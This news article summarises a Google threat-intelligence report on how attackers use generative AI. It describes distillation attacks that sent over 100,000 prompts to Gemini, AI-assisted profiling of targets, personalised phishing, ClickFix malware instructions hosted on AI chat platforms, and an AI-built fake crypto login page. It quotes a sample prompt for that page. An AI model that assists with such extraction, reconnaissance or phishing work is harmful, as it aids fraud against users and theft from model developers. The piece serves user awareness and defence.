Google warns on how AI is making hackers faster, smoother, and harder to spot; here’s how users are affected

/4 min read

ADVERTISEMENT

Google says adversaries are now “increasingly leveraging generative AI across multiple stages of the attack lifecycle,” from researching targets to drafting phishing messages and troubleshooting malicious code.
Google warns on how AI is making hackers faster, smoother, and harder to spot; here’s how users are affected
 Credits: Narendra Bisht

Artificial intelligence is not creating new kinds of cyberattacks. What it is doing, according to a new report from Google’s Threat Intelligence Group (GTIG), is making existing scams faster to produce, easier to personalise and harder for users to spot.

The report tracks how hackers and threat groups are using generative AI tools in real cyber operations. Its main finding is simple: attackers are beginning to treat AI as just another tool in their workflow. Google says adversaries are now “increasingly leveraging generative AI across multiple stages of the attack lifecycle,” from researching targets to drafting phishing messages and troubleshooting malicious code.

Here are key takeaways from the report that you, as a user, should be aware of how hackers are using AI to scam:

Model extraction attacks and what does it mean for regular users?

As per the report, Model extraction attacks (MEA) occur when an adversary uses legitimate access to systematically probe a mature machine learning model to extract information used to train a new model. Adversaries engaging in MEA use a technique called knowledge distillation (KD) to take information gleaned from one model and transfer the knowledge to another. For this reason, MEA are frequently referred to as "distillation attacks." 

In simple terms, bad actors, or hackers, prompt the original or the “teacher” model to give out data or reasoning processes to “teach” the “student” model, which the hackers have built. As per the report, over 100,000 prompts were identified, with the breadth of questions suggesting an attempt to replicate Gemini's reasoning ability in non-English target languages across a wide variety of tasks.

Google systems recognised this attack in real time and lowered the risk of this particular attack, protecting internal reasoning traces.

How are you as a user affected? 

Model extraction and distillation attacks do not typically represent a risk to average users, as they do not threaten the confidentiality, availability, or integrity of AI services. Instead, the risk is concentrated among model developers and service providers. Organisations that provide AI models as a service should monitor API access for extraction or distillation patterns. 

AI as a “strategic force multipiler”

This is where the real threat starts. Initially, hackers had to manually profile high-profile targets. Now, these actors use AI like Gemini to “serve as a strategic force multiplier during the reconnaissance phase of an attack”, allowing them to rapidly synthesise open-source intelligence (OSINT) to profile high-value targets, identify key decision-makers within defence sectors, and map organisational hierarchies. 

By integrating these tools into their workflow, threat actors can move from initial reconnaissance to active targeting at a faster pace and broader scale.  

How are you as a user affected? 

As hackers have detailed information about the target, phishing emails and scams are more personalised, making them unguessable. Acting as a “digital sniper”, AI helps in curating faster attack cycles. 

Using UNC6418, an unattributed threat actor, and Temp.HEX, a China-based threat actor, as examples, the report explains how they misused Gemini to conduct targeted intelligence gathering, specifically seeking out sensitive account credentials and email addresses. UNC6418 targeted accounts in a phishing campaign focused on Ukraine and the defence sector, while Temp.HEX misused Gemini and other AI tools to compile detailed information on specific individuals, including targets in Pakistan, and to collect operational and structural data on separatist organisations in various countries.

AI is being used for rapport-building phishing

Users have gotten used to indicators such as poor grammar, awkward syntax, or lack of cultural context to help identify phishing attempts. Now, threat actors leverage LLMs to generate hyper-personalised, culturally nuanced lures that can mirror the professional tone of a target organisation or local language. 

This is called "rapport-building phishing," where models are used to maintain multi-turn, believable conversations with victims to build trust before a malicious payload is ever delivered. “By lowering the barrier to entry for non-native speakers and automating the creation of high-quality content, adversaries can largely erase those 'tells' and improve the effectiveness of their social engineering efforts,” the report states.

How are you as a user affected? 

AI-driven rapport-building phishing makes scam messages sound natural, personalised, and culturally accurate, removing the usual red flags like bad grammar or awkward tone. Attackers can hold realistic, multi-step conversations to gain trust before sending malicious links or files.

The ‘ClickFix' Campaign

The report recorded that there were instances in which hackers abused the public's trust in generative AI services to attempt to deliver malware. This activity, first observed in early December 2025, attempts to trick users into installing malware via the well-established "ClickFix" technique. 

To explain it simply, threat actors would socially engineer users to copy and paste a malicious command into the command terminal, under the guise of “troubleshooting” a problem in the computer.

How are you as a user affected? 

Using a threat actor called ATOMIC as an example, which is an information stealer that targets the macOS environment and has the ability to collect browser data, cryptocurrency wallets, system information, and files in the Desktop and Documents folders. The threat actors behind this campaign have used a wide range of AI chat platforms to host their malicious instructions, including ChatGPT, CoPilot, DeepSeek, Gemini, and Grok.

How vibecoding has become easier

In November 2025, GTIG identified COINBAIT, a phishing kit, whose construction was likely accelerated by AI code generation tools, masquerading as a major cryptocurrency exchange for credential harvesting. Instead of creating a fake website from scratch, hackers now only need to give prompts to the AI, such as "Build me a modern, professional-looking login page for a major crypto exchange." What makes the result, the website, believable is that it is a React Single-Page Application (SPA). This means it has smooth animations, working buttons, and complex routing, making it look identical to a real financial site. 

How are you as a user affected? 

UNC5356, a financially motivated threat cluster, makes use of SMS- and phone-based phishing campaigns to target clients of financial organisations, cryptocurrency-related companies, and various other popular businesses and services. They send a clickable link, which routes the user to the dummy website, where you enter your credentials, and the hackers track every keystroke in real-time.

Explore the world of business like never before with the Fortune India app. From breaking news to in-depth features, experience it all in one place. Download Now